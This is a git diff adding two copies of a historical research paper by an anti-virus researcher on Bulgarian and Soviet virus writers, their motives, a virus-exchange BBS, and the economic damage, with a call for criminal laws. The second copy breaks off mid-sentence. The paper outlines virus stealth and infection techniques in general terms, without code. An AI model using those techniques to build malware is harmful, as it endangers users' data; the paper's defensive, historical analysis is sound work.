+information is not considered a crime --- since no one's property is + +damaged. + + + +The Bulgarian legislature is hopelessly old in this area. + +Furthermore, even if the appropriate law is accepted in the future, + +as a punishing law it will not be able to be applied to crimes, + +committed before it was passed. Therefore, the virus writers still + +have nothing to fear of. + + + +That is why, the creation of new computer viruses has become some + +kind of sport or entertainment in Bulgaria. + + + +4.1.4) + + + +The next reason is the very weak organization of the fight against + +computer viruses in Bulgaria. Just now our country is in a very deep + +economical crisis. We lack funds for everything, including such basic + +goods as food and gasoline. At the same time, the organization of the + +virus fight would require money --- for the establishment of a + +network of virus test centers that collect and investigate computer + +viruses, centers equipped with the best hardware, centers that are + +able to communicate between themselves and with the other similar + +centers in the world in an effective way. Such an effective way is + +the electronic mail system --- and Bulgaria still does its first + +steps in global computer communications. All this requires a lot of + +money --- money that our government just does not have now. 4.1.5) + +Another reason is the incorrect opinion, that the society has on the + +computer virus problem. + + + +Still, the victims of a computer virus attack consider themselves as + +victims of a bad joke, not as victims of a crime. + + + +4.1.6) + + + +The least important reason, in my opinion, is the availability and + +the easy access to information of a particular kind. + + + +All kind of tricks how to fool the operating system circulate among + +the Bulgarian hackers. Some of them are often published in the + +computer related magazines. As it was mentioned above, there is even + +a specialized BBS, dedicated to virus spreading and a special (local + +to Bulgaria) FidoNet echo, dedicated to virus writing. Not to mention + +the well--known file INTERxyy, published by Ralf Brown from the USA + +as shareware. It is very popular in Bulgaria, since it contains, + +carefully described, a huge number of undocumented tricks. + + + +However, this is not a very important reason. Usually those, who have + +decided to make a virus already know how to do it, or, at least, can + +figure it out by themselves. They do not need to take an existing + +virus and to modify it. The proof is the prevalence of original + +Bulgarian viruses over the variants of known ones, as well as the + +fact, that many new ideas for virus writing were first invented and + +implemented in Bulgaria. + + + +4.2) General reasons. + +--------------------- + + + +Since viruses are also created in all the other parts of the world, + +there should be also some general reasons for this. These reasons + +are, of course, valid for Bulgaria too. Let's see these general + +reasons. + + + +4.2.1) Wish for glory. + + + +Every programmer dreams that his/her program gets widely spread and + +used. A lot of very good programmers write and distribute wonderful + +software packages for free --- with the only intention to have more + +users using their package. However, for a program to be used, it has + +to be good enough. And not every programmer is able to make a program + +so good that the users will widely use it --- even for free. At the + +same time, computer viruses do spread very widely, regardless and + +even against the users' will. So, when a virus writer reads in a + +newspaper that his virus has been discovered at the other end of the + +world, he feels some kind of perverted pleasure. Some people write + +viruses just to see their names (or the names of their viruses) + +published in the newspapers. This reason has yet another aspect. In + +the beginning of the virus era, when the idea of the computer virus + +was very new, only the very good programmers were able to make a + +virus. It became a common myth that if you can write a virus, you're + +a great programmer. This myth might have been justified at the + +beginning, but now it is completely without sense. Nevertheless, + +young hackers began to write viruses --- just to prove to their + +friends and to the rest of the world how good programmers they are. + +Some of them were really unable to invent something original --- + +that's why they just picked a known virus, modified it a bit and + +released this new mutation. This explains why there are so many + +variants of the simplest viruses that were first created --- BRAIN, + +JERUSALEM, STONED, VIENNA, CASCADE... A typical example is the + +Italian virus writer, who calls himself Cracker Jack. + + + +4.2.2) Simple human curiosity. + + + +One has to admit that the idea of a computer program that is able to + +spread by its own means, to replicate, to hide from the user (who is + +believed to maintain the computer under full control), and in general + +to behave as a real live being is really fascinating. Just simple + +human curiosity is sufficient to make some people, if they are young + +and irresponsible enough, to try to make a computer virus. Some of + +them do succeed. A greater and greater part, if we consider the + +amount of last reports for new viruses. Some of them claim that they + +are writing viruses "only for themselves," "only for fun," and that + +"they do not spread them." However, it is often impossible to fully + +control the spread of a "successful" computer virus. The more clever + +these viruses are, the greater the probability that they will + +"escape." There is an idea to teach students how viruses are made --- + +of course in a very strongly restricted environment. Maybe at least + +for some this will fulfil their curiosity and they will not be + +tempted to write their own virus. Maybe if we force every computer + +science student to learn Dr. Fred Cohen's theorems on the + +computational aspects of computer viruses, if we administer an exam + +and ask students to design a virus protection scheme or to help a + +cluster of users, attacked by a computer virus for a course work --- + +well, maybe in this case these students will have more than enough of + +the computer virus problem and will not want to hear about it any + +more --- least to make their own viruses. 4.2.3) Easy access to + +information. + + + +Sufficient information, needed to write a virus can be found easily. + +This information is often even more accessible than in Bulgaria. + + + +The person that wants to write an average virus needs only to dig in + +the respective manuals --- manuals, which are often not available in + +Bulgaria. However, the usefulness of the easy access to this + +information is much greater than the damage, caused by the fact that + +it is used by the virus writers. + + + +4.2.4) Military interests. + + + +It is often rumoured that the superpowers are working on the problem + +how to use computer viruses to destroy the enemy computers' software. + +It is even very probable, that in several countries such research is + +performed. There are reports on this from the USA, France and the + +USSR. + + + +This is no wonder --- it is the right of every military force to + +investigate any new idea and to consider the possible usefulness + +and/or threats it might bring to the national defense. However, it is + +quite improbable that the computer viruses can be used for this + +purpose. Just like the live viruses, the computer ones are able to + +spread only among individuals with very similar immunotype, i.e. --- + +among compatible computers. The most widely used kinds of personal + +computers are the IBM PC, Macintosh, Amiga and Atari ST. It is + +therefore no wonder that the vast majority of existing computer + +viruses are able to infect only these computers. In the same time, + +viruses that infect one kind of computer (say, IBM PC), are unable to + +spread (or even to run) on another (e.g., a Macintosh). They are + +usually not able to run even on two different operating systems in + +one and the same computer. Even a different version of the same + +operating system might cause big problems to a particular computer + +virus --- up to preventing it to work. The common personal computers + +are never assigned important tasks in the army. Therefore, even if a + +virus infects them, and even if it destroys all the data on all such + +computers, the caused damage will not be of great importance. + +Computers that are used for the really important things, such as + +rocket leading or cannon aiming, are always specialized ones. Their + +programs are usually hard--coded and only data can be entered in + +them. It is not possible to insert an infected IBM PC diskette in the + +computers that control the NORAD system. At the same time, the + +computers that control different important devices are usually + +incompatible even between themselves. Therefore, even if someone + +writes a virus for a specialized rocket computer, this virus will not + +be able to infect the computers of a strategic bomber or even these + +of a rocket of a different system. So, such virus will not spread + +very much. And last, but not least, such virus has to be placed + +somehow in the enemy's computers. Since, as we saw above, it won't be + +able to spread from one computer to another of a different kind, + +obviously someone has to insert it in the victim computer. But if you + +have access to the enemy's computers, you don't need a virus. You can + +do the same task easier (and often much better) "manually", or with a + +Trojan horse or a logic bomb. 4..2.5) Corporate interests. + + + +It is also often speculated that the large software companies and the + +producers of anti--virus software make or willfully spread computer + +viruses. + + + +There is some reason behind this. Indeed the fear of viruses can make + +the user buy only original software (sometimes --- quite expensive), + +and not to use pirated copies, shareware or freeware. At the same + +time, companies that produce anti--virus software are interested that + +their products are sold. And they will be, if the user needs + +anti--virus protection. However, it is rather improbable, that a + +software company (whether producing or not anti--virus software) will + +take the risk to become known that it willfully spreads viruses. It + +will be probably boycotted by its users and the losses of income will + +be much greater than any gains. As to the producers of anti--virus + +software, they don't need to write viruses themselves, in order to + +sell their programs. It is sufficient to use the hype that the media + +accords to the problem, to mention how many viruses there are and how + +many of them their wonderful product is able to defeat. + + + +5) The Soviet virus factory and virus writing in the other countries + +===================================================================== + + of the former Eastern block. + + ============================ + + + +While Bulgaria was one of the best computerized countries in East + +Europe, the political, economical, and social conditions in the other + +countries were (and maybe still are) quite similar. That is why the + +virus writing and spreading has been developed in these countries + +too. + + + +Viruses are created in Poland ( W13, 217, 583, FATHER CHRISTMAS, DOT + +EATER, JOKER, VCOMM, AKUKU, 311, HYBRYD), in Hungary ( STONE `90, + +FILLER, MONXLA, POLIMER, TURBO KUKAC), in Czechoslovakia (the + +AANTIVIRUS virus), and even in Yugoslavia ( 17Y4, SVIR). According to + +some reports from Romania, there are no viruses written there, but + +the W13, YANKEE DOODLE, DARK AVENGER and StONED viruses are quite + +widespread. + + + +However, the country most similar to Bulgaria is, undoubtedly, the + +Soviet Union. According to the Soviet anti--virus researcher Bezrukov + +[Bezrukov], the first virus appeared there almost at the same time as + +in Bulgaria and, by the way, it was the same virus ( VIENNA). So, the + +preconditions are almost the same as with our country. + + + +There are, however, two main differences: the level of + +computerization and the number of virus writers. + + + +The level of computerization is still much lower than in Bulgaria. + +There are much fewer computers per person than in our country. The + +users are much more isolated, due to the much larger distances. The + +telephone network is in the same miserable condition, as in Bulgaria. + +The networks are very few and not widely used. For instance, in Sofia + +alone there are more FidoNet nodes than in the whole Soviet Union. It + +is not safe to send floppy disks by regular mail, since they will be + +probably stolen. All this delays very much the spreading of viruses. + +Unfortunately, it also delays the distribution of anti--virus + +products and the information exchange between the anti--virus + +researchers. For instance, examples of new viruses created there + +reach the Western anti--virus researchers with huge delays. + +Unfortunately, the other factor is much more dangerous. In the USSR + +there are much more programmers than in Bulgaria and they seem at + +least as much motivated in creating new viruses. The virus writing in + +the Soviet Union is currently in the same state as it was in Bulgaria + +about three years ago. However, at that time only nine variants of + +known viruses and one stupid original virus has been created there (6 + +VIENNA variants, 3 AMSTRAD variants, and the OLD YANKEE virus). At + +the first Soviet anti--virus conference in Kiev (mid--November, 1990) + +more than 35 different viruses of Russian origin were reported. + + + +Some of them were variants of known viruses, while others were + +completely new. It has been noticed that the Soviet virus writers are + +less qualified than the Bulgarian ones, but they use a destructive + +payload in their creations much more often. + + + +Since the reasons of virus writing in the USSR are very similar to + +those in Bulgaria; since this virus writing occurs in a much larger + +scale; and since no steps are taken by the authorities in order to + +stop it, it is possible to predict that in the next few years the + +Soviet Union will be far ahead of Bulgaria in computer virus creation + +and that a new, much larger wave of computer viruses will come from + +there. Probably after a year, several (up to ten) virus writers with + +the qualification of the Dark Avenger will emerge from there. + + + +6) The impact of the Bulgarian viruses on the West and on the national + +====================================================================== + + software industry. + + ================== + + + +While a huge part of the existing viruses are + +produced in Bulgaria, a relatively very small part of them spread + +successfully to the West. Of more than 160 Bulgarian viruses, only + +very few ( DARK AVENGER, V2000, V2100, PHOENIX, DIAMOND, + +NOMENKLATURA, VACSINA, YANKEE DOODLE) are relatively widespread. At + +the same time some of them ( DARK AVENGER, V2000, YANKEE DOODLE, + +VACSINA) are extremely widespread. According to John McAfee, about 10 + +% of all infections in the USA are caused by Bulgarian viruses --- + +usually by the DARK AVENGER virus. In West Europe this virus shares + +the popularity with YANKEE DOODLE and VACSINA. + + + +Of the viruses listed above, the major part are written by the Dark + +Avenger --- all except YANKEE DOODLE and VACSINA. Almost all his + +viruses (in this case --- with the exception of DIAMOND, which is the + +least spread) are extremely destructive. The PHOENIX and NOMENKLATURA + +viruses corrupt the FAT in such a subtle way, that when the user + +notices the damage, there is no way to disinfect the infected files + +and even to determine which files are damaged. The only way is to + +reformat the hard disk. + + + +It is difficult to estimate the costs of all damage caused by + +Bulgarian viruses. There are reports from Germany about a 10,000,000 + +DM damage, caused only by the VACSINA virus. It is probable, however, + +that these numbers are largely overestimated. + + + +The huge number of known Bulgarian viruses causes also indirect + +damage to the West community, even if the viruses themselves do not + +escape from Bulgaria, but only examples of them are supplied to the + +anti--virus researchers. These researchers have to develop + +anti--virus programs against these viruses (just in case the latter + +succeed to spread outside Bulgaria). Therefore, they have to waste + +their time and efforts. Furthermore, the user is forced to buy new + +anti--virus programs (or pay for updates of the old ones), in order + +to feel safe against these viruses. In the same time, the creation + +and spreading of Bulgarian viruses causes a lot of damage to the + +Bulgarian economics. In Bulgaria, the Bulgarian viruses are much more + +widespread. More than 80 % of about 160 known Bulgarian viruses have + +been detected in the wild in our country. It is difficult, however, + +to evaluate, or even to estimate the exact costs of the caused + +damage, since in Bulgaria the term "property of computer information" + +simply does not exist in legal sense. It is the same with the cost of + +this information. In fact, the creation of computer viruses causes + +also indirect damage to our economics. First of all, a lot of + +extremely capable people are wasting their minds to create + +destructive viruses, instead of something useful. Second, the fact + +that the Bulgarian programmers use their time to create computer + +viruses destroys their reputation as a whole. No serious software + +company accepts to deal with Bulgarian programmers or software + +companies, because it is afraid that the supplied software might be + +pirated or might contain a virus. 7) Conclusion. Virus writing in + +Bulgaria is an extremely widespread hobby. Most of the major virus + +writers are known, but no measures can be taken against them. Their + +work causes a lot of damage to the Western community, as well as to + +the national economics. Therefore, it is urgent to take legal + +measures in this direction; measures that will make virus writing and + +willful spread of computer viruses a criminal act. This is the only + +way to stop, or at least to reduce the threat. + + + +References + +========== + + + +[KV88] Viruses in Memory, Komputar za vas, 4--5, 1988, pp.12--13 (in + +Bulgarian) + + + +[KV89] The Truth about Computer Viruses, Vesselin Bontchev, Komputar + +za vas, 1--2, 1989, pp. 5--6 (in Bulgarian) + + + +[Chip] Die neue Gefahr --- Computerviren, Steffen Wernery, Chip, 9, + +1987, pp. 34--37 (in German) + + + +[Bezrukov] Computer Virology, Nikolay Nikolaevitch Bezrukov, Kiev, + +1991, ISBN 5-88500-931-X (in Russian) + + + + + +Downloaded From P-80 International Information Systems 304-744-2253 + diff --git a/textfiles.com/virus/bulgfactdoc.vir b/textfiles.com/virus/bulgfactdoc.vir new file mode 100644 index 00000000..683280a0 --- /dev/null +++ b/textfiles.com/virus/bulgfactdoc.vir @@ -0,0 +1,1106 @@ + + The Bulgarian and Soviet Virus Factories + ======================================== + + Vesselin Bontchev, Director + Laboratory of Computer Virology + Bulgarian Academy of Sciences, Sofia, Bulgaria + + +0) Abstract +=========== + +It is now well known that Bulgaria is leader in computer virus +production and the USSR is following closely. This paper tries to +answer the main questions: Who makes viruses there, What viruses are +made, and Why this is done. It also underlines the impact of this +process on the West, as well as on the national software industry. + +1) How the story began +====================== + +Just three years ago there were no computer viruses in Bulgaria. +After all, these were things that can happen only in the capitalist +countries. They were first mentioned in the April issue of the +Bulgarian computer magazine "Komputar za vas" ("Computer for you") +[KV88] in a paper, translated from the German magazine "Chip" [Chip]. +Soon after that, the same Bulgarian magazine published an article +[KV89]], explaining why computer viruses cannot be dangerous. The +arguments presented were, in general, correct, but the author had +completely missed the fact that the majority of PC users are not +experienced programmers. + +A few months later, in the fall of the same year, two men came in the +editor's office of the magazine and claimed that they have found a +computer virus. Careful examination showed that it was the VIENNA +virus. + +At that time the computer virus was a completely new idea for us. To +make a computer program, whose performance resembles a live being, is +able to replicate and to move from computer to computer even against +the will of the user, seemed extremely exciting. + +The fact that "it can be done" and that even "it had been done" +spread in our country like wildfire. Soon hackers obtained a copy of +the virus and began to hack it. It was noticed that the program +contains no "black magic" and that it was even quite sloppily +written. Soon new, home--made and improved versions appeared. Some of +them were produced just by assembling the disassembly of the virus +using a better optimizing assembler. Some were optimized by hand. As +a result, now there are several versions of this virus, that were +created in Bulgaria --- versions with infective lengths of 627, 623, +622, 435, 367, 353 and even 348 bytes. The virus has been made almost +two times shorter (its original infective length is 648 bytes) +without any loss of functionality. + +This virus was the first case. Soon after that, we were "visited" by +the CASCADE and the PING PONG viruses. The later was the first +boot--sector virus and proved that this special area, present on +every diskette can be used as a virus carrier, too. All these three +viruses were probably imported with illegal copies of pirated +programs. + +2) Who, What & Why. +=================== + +2.1) The first Bulgarian virus. +------------------------------- + +At that time both known viruses that infected files ( VIENNA and +CASCADE) infected only COM files. This made me believe that the +infection of EXE files was much more difficult. Unfortunately, I made +the mistake by telling my opinion to a friend of mine. Let's call him +"V.B." for privacy reasons.(1) +................................................................... +[(1) These are the initials of his true name. It +will be the same with the other virus writers that I shall mention. +Please note, that while I have the same initials (and even his full +name resembles mine), we are two different persons.] +................................................................... +The challenge was taken immediately and soon after that I received a +simple virus that was able to infect only EXE files. It is now known +to the world under the name of OLD YANKEE. The reason for this is +that when the virus infects a new file, it plays the "Yankee Doodle" +melody. + +The virus itself was quite trivial. Its only feature was its ability +to infect EXE files. The author of this virus even distributed its +source code (or, more exactly, the source code of the program that +releases it). Nevertheless, the virus did not spread very widely and +even had not been modified a lot. Only a few sites reported to be +infected by it. Probably the reason for this was the fact, that the +virus was non--resident and that it infected files only on the +current drive. So the only possibility to get infected by it was to +copy an infected file from one computer to another. + +When the puzzle of creating a virus which is able to infect EXE files +was solved, V.B. lost his interest in this field and didn't write any +other viruses. As far as I know, he currently works in real--time +signal processing. + +2.2) The T.P. case. +------------------- + +The second Bulgarian virus--writer, T.P., caused much more trouble. +When he first heard the idea about aself--replicating program, he was + very interested, decided to writehis own virus, and he succeeded. +Then he tried to implement a virus protection scheme and succeeded +again. The next move was to improve his virus to bypass his own virus +protection, then to improve the virus protection and so on. That is +why there are currently about 50 different versions of his viruses. + +Unfortunately, several of them (about a dozen) were quite +"successful." They spread world--wide. There are reports about them +from all countries of the former Eastern block, as well as from the +USA and West Europe. + +Earlier versions of these TP viruses are known under the name +VACSINA, because they contain such a string. In fact, this is the +name of the virus author's virus protection program. It is +implemented as a device driver with this name. The virus merely tries +to open a file with this name, which means "Hey, it's me, let me +pass." + +The latest versions of the virus are best known under the name YANKEE +DOODLE, because they play this tune. The conditions on which the tune +is played are different with the different versions of the virus --- +for instance when the user tries to reboot the system, or when the +system timer reaches 5 p.m. + +All TP viruses are strictly non--destructive. Their author payed +particular attention not to destroy any data. For instance, the virus +does not infect EXE files for which the true file length and the +length of the loadable part as it is present in the EXE header, are +not equal. As far as I know, no other virus that is able to infect +EXE files works this way. + +Also, the virus does not try to bypass the resident programs that +have intercepted INT 13h, therefore it takes the risk to be detected +by most virus activities monitoring software. The author of the virus +obviously could circumvent it --- for instance it uses a clever +technique, now known as "interrupt tracing" to bypass all programs +that have hooked INT 21h. The only reason for not bypassing INT 13h +as well, is that this would also bypass all disk casheing programs, +thus it could cause damage. + +Of course, the fact that the virus is not intentionally destructive +does not mean that it does not cause any damage. There are several +reports of incompatibilities with other software; or of panicking +users, that have formatted their disks; or, at least, damage caused +by time loss, denial of computer services, or expenses removing the +virus. It is well known, that "there ain't no such thing as a good +virus." + +The TP viruses were not spread intentionally; the cause could be +called "criminal negligence." The computer used by T.P. to develope +his viruses was also shared by several other people. This is common +practice in Bulgaria, where not everyone can have a really "personal" +computer to work with. T.P. warned the other users that he is writing +viruses, but at this time computer viruses were a completely new +idea, so nobody took the warning seriously. Since T.P. didn't bother +to clean up after himself, these users got, of course, infected. +Unintentionally, they spread the infection further. + +When asked about the reason of writing viruses, T.P. replied that he +did this in order to try several new ideas; to better learn the +operating system and several programming tricks. He is not interested +in this field any more --- he has stopped writing viruses about two +years ago. + +2.3) The Dark Avenger. +---------------------- + +In the spring of 1989 a new virus appeared in Bulgaria. It was +obviously "home--made" and just to remove any doubts about it, there +was a string in it, saying "This program was written in the city of +Sofia (C) 1988-89 Dark Avenger." + +The virus was incredibly infectious --- when it was in memory, it was +sufficient to copy or just to open a file to get it infected. When +the user felt that there is a virus in his/her system and, without +booting from a non--infected write--protected system diskette, ran an +anti--virus program which wasn't aware of this new virus, he usually +got all his/her executable files infected. + +The idea of infecting a file when it is opened was new and really +"successful." Now such viruses are called "fast infectors." This +strategy helped the virus to spread world-- wide. There are reports +from all European countries, from the USA, the USSR, even from +Thailand and Mongolia. + +On the top of this, the virus was very dangerously destructive. On +each 16th run of an infected program, it overwrote a sector on a +random place of the disk, thus possibly destroying the file or +directory that contained this sector. The contents of the overwritten +sector was the first 512 bytes of the virus body, so even after the +system has been cleaned up, there were files, containing a string +"Eddie lives...somewhere in time!" This was causing much more damage +than if the virus was just formatting the hard disk, since the +destruction was very unnoticable and when the user eventually +discovered it, his backups probably already contained corrupted data. + +Soon after that, other clever viruses began to appear. Almost all of +them were very destructive. Several contained completely new ideas. +Now this person (we still cannot identify him exactly) is believed to +be the author of the following viruses: + +DARK AVENGER, V2000 (two variants), V2100 (two variants), 651, +DIAMOND (two variants), NOMENKLATURA, 512 (six variants), 800, 1226, +PROUD, EVIL, PHOENIX, ANTHRAX, LEECH... + + +Dark Avenger has several times attacked some anti--virus researchers +personally. The V2000/V2100 viruses claim to be written by "Vesselin +Bontchev" and in fact hang the computer when any program, containing +this string is run. A slightly modified variant of V2100 (V2100-B) +has been used to trojanize version 66 of John McAfee's package +VIRUSCAN. + +There are reports that Dark Avenger has called several bulletin board +systems in Europe and has uploaded there viruses. The reports come +from the UK, Sweden, the Netherlands, Greece... Sometimes the viruses +uploaded there are unknown in Bulgaria (NOMENKLATURA,ANTHRAX). But +they are obviously made in our country --- they contain messages in +Cyrillic. Sometimes Dark Avenger uploads a Trojan program that +spreads the virus --- not just an infected program. This makes the +detection of the source of infection more difficult. + +One particular case is when he has uploaded a file called UScan, +which, when run, claims to be the "universal virus scanner," written +by Vesselin Bontchev. Even the person who has uploaded it, has logged +under the name "Vesselin Bontchev." In fact, the program just +infected all scanned files with the ANTHRAX virus. + +While the other Bulgarian virus writers seem to be just irresponsible +or with childish mentality, the Dark Avenger can be classified as a +"technopath." He is a regular user of several Bulgarian bulletin +board systems, so one can easily exchange e-mail messages with him. +When asked why his viruses are destructive, he replied that +"destroying data is a pleasure" and that he "just loves to destroy +other people's work." + +Unfortunately, no measures can be taken against him in Bulgaria. +Since there is no law for information protection, his activities are +not illegal there. He can be easily caught by tapping the phones of +the BBSes that he uses, but the law enforcement authorities cannot +take such measures, since there is no evidence of illegal activities. +Alas, he knows this perfectly. + +2.4) Lubo & Ian. +---------------- + +Some of the Dark Avenger's viruses proved to be very "successful" and +caused real epidemics. That is why they were often imitated by other +virus writers, that had no imagination to design their own virus, but +were jealous of Dark Avenger's fame. So they just disassembled his +viruses (usually the first one) and used parts of it --- sometimes +without even understanding their purpose. Such is the case with the +MURPHY viruses. + +According to a string in them, they are written by "Lubo & Ian, USM +Laboratory, Sofia." These people do exist and they have used their +real names. "Lubo" has even been several times interviewed by +newspaper's reporters. + +They claim that the virus was written for vengeance. They have done +some important work for their boss and the latter refused to pay +them. That is why they developed te virus in one night and released +it. The fact that the virus will spread outside the laboratory just +didn't come to their minds. However, this does not explain the +developing of the other versions of the same virus (there are at +least four variants). Nevertheless, it proves one more time that it +is better (and safer, too) to pay the good programmers well... + +Besides MURPHY, these two virus writers have created another virus, +called SENTINEL (5 variants). The only unusual thing with this virus +is that it is written in a high--level programming language (Turbo +PASCAL), but is not an overwriting or a companion virus as most HLL +viruses are. It is able to infect COM and EXE files by appending +itself to them and by preserving their full functionality. It is also +memory resident, hides the file length increase when the user issues +the DIR command, and even mutates. + +2.5) The virus writer from Plovdiv. +----------------------------------- + +This man, P.D., claimed that he has written viruses "for fun" and +only "for himself" and that he "never releases them." Unfortunately, +at least two of them have "escaped" by accident. These are the ANTI- +PASCAL605 and the TERROR viruses. Especially the latter is extremely +virulent and caused a large epidemic in Bulgaria. + +P.D. was very sorry for that and submitted examples of all his +viruses to the anti--virus researchers so that the respective +anti--virus programs be developed --- just in case some of these +viruses escapes too. These viruses turned out to be quite a few, +ranging from extremely stupid to very sophisticated. Here are some of +them: + +XBOOT, ANTIPASCAL (5 variants), TINY (11 variants), MINIMAL-45, +TERROR, DARK LORD, NINA, GERGANA, HAPPY NEW YEAR (2 variants), INT +13. + +P.D. claims that the DARK LORD virus (a minor TERROR variant) is not +written by him. The TINY family has nothing to do with the Danish +TINY virus (the 163--byte variant of the KENNEDY virus), and, as well +as the MINIMAL-45 virus, are written with the only purpose to make +the shortest virus in the world. + +Now P.D. is not writing viruses any more --- because "it is so easy, +that it is not interesting," according to his own words. He is +currently writing anti--virus programs --- and rather good ones. + +2.6) The two guys from Varna. +----------------------------- + +They are two pupils (V.P. and S.K.) from the Mathematical High School +in Varna (a town on the Black Sea). They have developed several +viruses and continue to do so, producing more and more sophisticated +ones. Furthermore, they intentionally spread their viruses, usually +releasing them on the school's computers or in the Technical +University in Varna. When asked why they write and release viruses, +they reply "because it's so interesting!" + +The viruses written by them are: MG (5 variants), SHAKE (5 variants), +DIR and DIR II. All of them are memory resident and infect files when +the DIR command is performed. + +The last one is an extremely virulent and sophisticated virus --- as +sophisticated, as THE NUMBER OF THE BEAST. It is also a completely +new type of virus --- it infects nether boot sectors, nor files. +Instead, it infects the file system as a whole, changing the +information in the directory entries, so that each file seems to +begin with the virus. + +There is a counter of the number of infected systems in the virus +body. There is evidence that V.P. and S.K. collect infected files, +copy the contents of the counter and then draw curves of the spread +of infection, checking the normal distribution law. They are doing +this "for fun." + +2.7) W.T.'s case. +----------------- + +W.T. is a virus writer from Sofia, who has written two viruses --- +WWT (2 variants) and DARTH VADER (4 variants). According to his own +words, he has done so to test a new idea and to gain access to the +Virus eXchange BBS (see below). + +The new idea consisted of a virus (DARTH VADER) that does not +increase file lengths, because it searches for unused holes, filled +with zeros, and writes itself there. Also, the virus does not perform +any write operations. Instead, it just waits for a COM file to be +written to by DOS and modifies the file's image in memory just before +the write operation is performed. + +W.T. does not write viruses any more, but he is still extremely +interested in this field. He is collecting sophisticated viruses and +disassembles them, looking for clever ideas. + +2.8) The Naughty Hacker. +------------------------ + +This virus writer, M.H., is a pupil and also lives in Sofia. He has +written several viruses, most of which contain the string "Naughty +Hacker" in their body. All of them are non-- destructive, but contain +different video effects --- from display desynchronization to a +bouncing ball. + +Currently, at least 8 different variants are isolated, but it is +believed that even more exist and are spread in the wild. Also, it is +believed that M.H. continues to produce viruses. As usual, he is +doing so "because it is interesting" and "for fun." + +He is also the author of three simple boot sector viruses (BOOTHORSE +and two others that are still unnamed). + +2.9) Other known virus writers. +------------------------------- + +The persons listed above are the major Bulgarian virus producers. +However, they are not alone. Several other people in Bulgaria have +written at least one virus (sometimes more). In fact, making a virus +is currently considered there a kind of sport, or a practical joke, +or means of self--establishment. + +Some of these virus writers have supplied their creations directly to +the anti--virus researchers, as if they are waiting for a reward. +This happens quite often --- probably they expect that the +anti--virus researcher, as the best qualified person, will evaluate +their creation better. Sometimes the fact that their virus becomes +known, is described, and is included in the best anti--virus programs +is sufficient for these people and they don't bother to really spread +their virus in the wild. So, probably the main reason for these +people to produce viruses is the seek of glory, fame, and +self--establishment. + +Such known Bulgarian virus writers (with the respective names of +their viruses given in parentheses) are V.D. from Pleven (MICRO-128), +A.S. and R.D. from Mihajlovgrad (V123), I.D. from Trojan (MUTANT, +V127, V270x), K.D. from Tutrakan (BOYS, WARRIER, WARRIOR, DREAM), and +others. + +2.10) Unknown Bulgarian virus writers. +-------------------------------------- + +Of course, there are also other virus writers, that are not known to +the author of this paper. Sometimes it is possible to determine the +town where the viruses were developed --- usually due to an +appropriate string in the virus body, or because the virus wasn't +found elsewhere. Some of the viruses are very simple, others are +quite sophisticated. Here are examples of such viruses. + + +- The KAMIKAZE virus has been detected only in the Institute of + Mathematics at the Bulgarian Academy of Sciences, Sofia and is + probably made there; + +- The RAT virus, made in Sofia, as it is written in its body; + +- The VFSI (HAPPY DAY) virus has been developed in the Higher + Institute of Finances and Economics in Svishtov (a small town on the + Danube) by an unknown programmer; + +- The DESTRUCTOR virus, probably made in Plovdiv, where it has been + first detected; + +- The PARITY virus, probably written in the Technical University, + Sofia, since it has not been detected elsewhere; + +- The TONY file and boot sector viruses, probably created in Plovdiv + where they have been first detected; + +- The ETC virus, detected only in Sofia; + +- The 1963 virus, a quite sophisticated one, probably made in the + Sofia University; + +- The JUSTICE virus. + +2.11) The Virus eXchange BBS. +----------------------------- + +About a year ago, the virus writing in Bulgaria entered a new phase. +The virus writers began to organize themselves. The first step was +the creation of a specialized bulletin board system (BBS), dedicated +to virus exchange. The Virus eXchange BBS. + +It's system operator (SysOp), T.T. is a student of computer science +in the Sofia University. He has established the BBS in his own home. +On this BBS, there are two major kinds of files --- anti--virus +programs and viruses. The anti--virus programs can be downloaded +freely. + +In order to get access to the virus area, one has to upload there a +new virus. However, anyone who uploads a new virus, gets access to +the whole virus collection. S/He could then download every virus that +is already available, or even all of them. No questions are asked --- +for instance for what reason s/he might need these viruses. + +Furthermore, the SysOp takes no steps to verify the identity of his +users. They are allowed to use fake names and are even encouraged to +do so. Dark Avenger and W.T., between them are, the most active +users, but there are also names like George Bush from New York, +Saddam Hussein from Baghdad, Ozzy Ozburn and others. + +Since this BBS has already a large collection of computer viruses +(about 300), it is quite difficult to find a new virus for it. If one +wants badly to get access to the virus area, it is much simpler to +write a new virus, instead of trying to find a new one. That is +exactly what W.T. did. Therefore, this BBS encourages virus writing. + +Furthermore, on this BBS there are all kinds of viruses --- some of +them as 1260, V2P6Z, FLIP, WHALE are considered as extremely +dangerous, since they are using several new ideas and clever tricks, +which makes them very difficult to be recognized and removed from the +infected files. And the Virus eXchange BBS policy makes all these +viruses freely available to any hacker that bothers to download them. +This will, undoubtedly, lead to the creation of more and more such +"difficult" viruses in the near future. + +The free availability of live viruses has already given its bitter +fruits. It helped to viruses created far away from Bulgaria and not +widely spread, to cause epidemics in our country. Such was the case +of the DATALOCK virus. It has been created in California, USA and +uploaded to the Virus eXchange BBS. A few weeks later it was detected +in the Technical University, Sofia. Probably one of the users of the +BBS had downloaded it from there and spread it "for fun." In the +similar way the INTERNAL, TYPO and 1575 viruses entered our country. + +But the free availability of known live viruses is not the most +dangerous thing. After all, since they are already known, there +already exist programs to detect and probably to remove them. Much +more dangerous is the free availability on this BBS of virus source +code! Indeed, original source code or well commented virus +disassemblies of several viruses are freely available on the Virus +eXchange BBS --- just as any other live virus. To name a few, there +are: + +DARK AVENGER, OLD YANKEE, DIAMOND, AMSTRAD, HYMN, MLTI830, MURPHY, +MAGNITOGORSK, ICELANDIC, MIX1, STONED, JERUSALEM, DATACRIME, BURGER, +ARMAGEDON, OROPAX, DARTH VADER, NAUGHTY HACKER, 512, VIENNA, 4096, +FISH#6, PING PONG, BLACK JEC, WWT, MG, TSD, BOOTHORSE, BAD BOY, +LEECH... + +Most of them are perfectly assemblable sources. + +The publishing of virus source code has proven to be the most +dangerous thing in this field. The VIENNA, JERUSALEM, CASCADE and +AMSTRAD viruses are the best examples. Their source code has been +made publicly available, which led to the creation of scores of new +variants of these viruses. The known variants of only these four +viruses are about 20 % of all known viruses, which means more than a +hundred variants. One can imagine the consequences of making publicly +available the source code of all the viruses listed above. In less +than a year we probably will be submerged by thousands new +variants... + +In fact, this process has already begun. The HIV, MIGRAM, KAMASYA, +CEMETERY and ANTICHRIST viruses have been obviously created by +someone who had access to the source of the MURPHY virus. The ENIGMA +virus is clearly based on the OLD YANKEE code. There have been +reports about infections with these viruses in one Italian school and +an Italian virus writer, known as Cracker Jack is a user of Virus +eXchange... + +The damage caused by this BBS alone to the 